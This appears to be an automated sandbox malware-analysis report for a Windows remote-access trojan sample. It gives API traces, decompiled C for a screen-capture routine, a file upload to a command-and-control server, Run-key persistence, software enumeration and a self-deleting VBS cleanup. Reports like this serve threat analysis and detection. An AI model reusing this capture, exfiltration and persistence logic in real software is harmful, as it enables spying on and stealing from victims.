                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				struct HDC__* _v16;
                                  				int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				char _v44;
                                  				intOrPtr _v50;
                                  				void* _v52;
                                  				void* _v54;
                                  				intOrPtr _v58;
                                  				char _v60;
                                  				char _v76;
                                  				intOrPtr _v80;
                                  				struct tagCURSORINFO _v96;
                                  				signed int _v102;
                                  				signed int _v104;
                                  				long _v112;
                                  				long _v116;
                                  				char _v120;
                                  				struct _ICONINFO _v140;
                                  				int _t143;
                                  				void* _t144;
                                  				signed int _t153;
                                  				long _t164;
                                  				void* _t165;
                                  				char* _t189;
                                  				signed int _t193;
                                  				void* _t214;
                                  				signed int _t222;
                                  				signed char _t224;
                                  				signed int _t225;
                                  				signed int _t242;
                                  				struct HDC__* _t245;
                                  				int _t249;
                                  				struct tagBITMAPINFO* _t250;
                                  
                                  				_t214 = 0;
                                  				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                  				_v16 = _t245;
                                  				_v8 = CreateCompatibleDC(_t245);
                                  				_t248 = 0x41bfc8 + _a12 * 4;
                                  				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                  				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                  				_v28 = _t143;
                                  				if(_v12 != 0 || _t143 != 0) {
                                  					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                  					_a12 = _t144;
                                  					if(_t144 != _t214) {
                                  						if(SelectObject(_v8, _t144) != 0) {
                                  							_v24 = _t214;
                                  							asm("stosd");
                                  							E0040FF57( *_t248,  &_v24);
                                  							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                  								if(_a8 != 0) {
                                  									_v96.cbSize = 0x14;
                                  									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                  										DeleteObject(_v140.hbmColor);
                                  										DeleteObject(_v140.hbmMask);
                                  										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                  										_t214 = 0;
                                  									}
                                  								}
                                  								_push( &_v120);
                                  								_t249 = 0x18;
                                  								if(GetObjectA(_a12, _t249, ??) != 0) {
                                  									_t153 = _v102 * _v104;
                                  									_t242 = 1;
                                  									if(_t153 != _t242) {
                                  										_t222 = 4;
                                  										if(_t153 > _t222) {
                                  											_t222 = 8;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											_t222 = 0x10;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											if(_t153 > _t249) {
                                  												_a8 = 0x20;
                                  												L28:
                                  												_push(0x28 + (_t242 << _a8) * 4);
                                  												L23:
                                  												_t250 = LocalAlloc(0x40, ??);
                                  												_t224 = _a8;
                                  												_t250->bmiHeader = 0x28;
                                  												_t250->bmiHeader.biWidth = _v116;
                                  												_t250->bmiHeader.biHeight = _v112;
                                  												_t250->bmiHeader.biPlanes = _v104;
                                  												_t250->bmiHeader.biBitCount = _v102;
                                  												if(_t224 < 0x18) {
                                  													_t193 = 1;
                                  													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                  												}
                                  												_t225 = 8;
                                  												asm("cdq");
                                  												_t250->bmiHeader.biCompression = _t214;
                                  												_t250->bmiHeader.biClrImportant = _t214;
                                  												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                  												_t250->bmiHeader.biSizeImage = _t164;
                                  												_t165 = GlobalAlloc(_t214, _t164);
                                  												_v12 = _t165;
                                  												if(_t165 != _t214) {
                                  													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                  														_v60 = 0x4d42;
                                  														_v54 = _t214;
                                  														_v52 = _t214;
                                  														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                  														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														DeleteObject(_a12);
                                  														GlobalFree(_v12);
                                  														DeleteDC(_v16);
                                  														DeleteDC(_v8);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														goto L33;
                                  													}
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													GlobalFree(_v12);
                                  													_t189 =  &_a11;
                                  												} else {
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													_t189 =  &_a11;
                                  												}
                                  												goto L31;
                                  											}
                                  											_a8 = _t249;
                                  											_push(0x28);
                                  											goto L23;
                                  										}
                                  										L18:
                                  										_a8 = _t222;
                                  										goto L28;
                                  									}
                                  									_a8 = _t242;
                                  									goto L28;
                                  								} else {
                                  									DeleteDC(_v16);
                                  									DeleteDC(_v8);
                                  									DeleteObject(_a12);
                                  									_t189 =  &_a11;
                                  									goto L31;
                                  								}
                                  							}
                                  							DeleteDC(_v16);
                                  							DeleteDC(_v8);
                                  							DeleteObject(_a12);
                                  							_t189 =  &_a11;
                                  							goto L31;
                                  						}
                                  						DeleteDC(_t245);
                                  						DeleteDC(_v8);
                                  						DeleteObject(_a12);
                                  						_t189 =  &_a11;
                                  						goto L31;
                                  					}
                                  					DeleteDC(_t245);
                                  					DeleteDC(_v8);
                                  					DeleteObject(_t214);
                                  					_t189 =  &_a11;
                                  					goto L31;
                                  				} else {
                                  					_t189 =  &_a11;
                                  					L31:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                  					L33:
                                  					return _a4;
                                  				}
                                  			}

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                    • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 585525397-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 615b1700c6fa7c988836e9402474fc1b087ee783a9023c5bf4cee90924b5f3f1
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 615b1700c6fa7c988836e9402474fc1b087ee783a9023c5bf4cee90924b5f3f1
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
